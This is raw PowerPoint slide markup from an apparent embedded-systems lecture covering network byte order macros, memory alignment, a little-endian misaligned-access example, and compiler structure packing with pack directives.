            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>2 systems communicating over network must synchronize the bytes order</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>The TCP/IP stack is defined as big-endian. Every 16-bit or 32-bit value in the headers of the layers must by sent with MSB first</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Common macros for translating integers to network order: htons(), htonl(), ntohs(), ntohl()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>For big-endian systems the macros do nothing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>For little-endian systems the macros reverse the bytes in the short/long integers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20162507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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Memory Alignment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182275" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1447800"/>
            <a:ext cx="8229600" cy="1447800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A memory address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>n-byte aligned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> when n is a power of 2 and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is a multiple of n bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="182319" name="Group 47"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2209800" y="3200400"/>
          <a:ext cx="4800600" cy="2865500"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1714500"/>
                <a:gridCol w="1028700"/>
                <a:gridCol w="1028700"/>
                <a:gridCol w="1028700"/>
              </a:tblGrid>
              <a:tr h="640009">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Address</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1-byte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2-byte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4-byte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0x100000</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69847">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0x100001</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0x100002</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0x100003</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69847">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0x100004</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0x100005</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25589253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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Memory Alignment Problems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>A memory access is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" i="1" dirty="0" smtClean="0"/>
              <a:t>aligned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t> when the integer being accessed is n bytes long and its address is n-byte aligned</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>The memory operations (load and store) in the processor can be 1/2/4 bytes (8/16/32 bits) wide</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>When accessing 4-bytes integer, the processor uses 4-byte aligned address (last 2 least significant bits are 0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>When accessing 2-bytes integer, the processor uses 2-byte aligned address (last 1 least significant bit is 0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>When accessing 1-byte integer, the processor uses 1-byte aligned address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>When the processor memory access is unaligned, the data is loaded/stored incorrectly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Some processors can send an interrupt on a misaligned memory access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41977617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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Memory Alignment Problems – Cont.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="3200400"/>
            <a:ext cx="8153400" cy="3352800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Example (little </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>endian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>UINT16 var1 = *(UINT16*)0x100000;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>UINT32 var2 = *(UINT32*)0x100003;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>UINT8 var3 = *(UINT8*)0x100009;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>What will be the values of var1, var2 and var3?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>The value of var1 is 0x1B1A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>The value of var2 is 0x1D1C1B1A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>The value of var3 is 0x23</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2050" name="Object 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4083188128"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4572000" y="1665288"/>
          <a:ext cx="4232275" cy="1665287"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s6185" name="Visio" r:id="rId4" imgW="3782187" imgH="1808798" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId4" imgW="3782187" imgH="18087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65288"/>
                        <a:ext cx="4232275" cy="1665287"/>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41208492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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Memory Packing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>The compiler allocates individual data items on aligned boundaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>A UINT32 will be given a 4-byte aligned address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>A UINT16 will be given a 2-byte aligned address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>A data structure often include data items of different alignment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>In order to have aligned memory access, padding can be added by the compiler between the items in the structure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>A whole data structure can be padded at the end to allow aligned array of that structure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27749805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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Memory Packing – Cont.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190467" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1295400"/>
            <a:ext cx="8229600" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3077" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="2819400"/>
            <a:ext cx="2971800" cy="23082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uint16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p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3074" name="Object 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3423119366"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3429000" y="3048000"/>
          <a:ext cx="5334000" cy="1631950"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s7209" name="Visio" r:id="rId4" imgW="6787440" imgH="2316600" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId4" imgW="6787440" imgH="23166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048000"/>
                        <a:ext cx="5334000" cy="1631950"/>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11712106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smtClean="0"/>
              <a:t>Memory Packing – Cont.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" smtClean="0"/>
              <a:t>It is possible to minimize the amount of padding in the data structure by changing the order of its items.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" smtClean="0"/>
              <a:t>It is possible to instruct the compiler to “pack” the items in the structure to specific alignment.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0"/>
              <a:t>Pack(2) will align items larger than 1 byte to 2-byte alignment. The maximum padding between items will be 1 byte</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0"/>
              <a:t>Pack(1) will align items to 1-byte alignment. No padding between items</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" smtClean="0"/>
              <a:t>Data structure packing is used for several reasons:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0"/>
              <a:t>Save memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0"/>
              <a:t>Format data for transmission using a standard protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" smtClean="0"/>
              <a:t>Access to unaligned items in a packet structure has a big overhead. Processor can’t read the items directly, so compiler has to manipulate the data before using it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3760426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embedded systems</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Diagram 5"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685800" y="1371600"/>
          <a:ext cx="822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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Memory Packing – Cont.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="3886200"/>
            <a:ext cx="2971800" cy="2862262"/>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pack(1)</a:t>
            </a:r>
          </a:p>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unit16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a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>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pack()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="40966" name="Object 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3029221109"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3308350" y="4648200"/>
          <a:ext cx="5683250" cy="1739900"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s8272" name="Visio" r:id="rId4" imgW="5894085" imgH="1961529" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId4" imgW="5894085" imgH="1961529" progId="Visio.Drawing.11">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name=""/>
                      <p:cNvPicPr>
                        <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                      </p:cNvPicPr>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId5"/>
                      <a:srcRect/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr bwMode="auto">
                      <a:xfrm>
                        <a:off x="3308350" y="4648200"/>
                        <a:ext cx="5683250" cy="1739900"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:solidFill>
                        <a:schemeClr val="tx2"/>
                      </a:solidFill>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                      <a:effectLst/>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4102" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1371600"/>
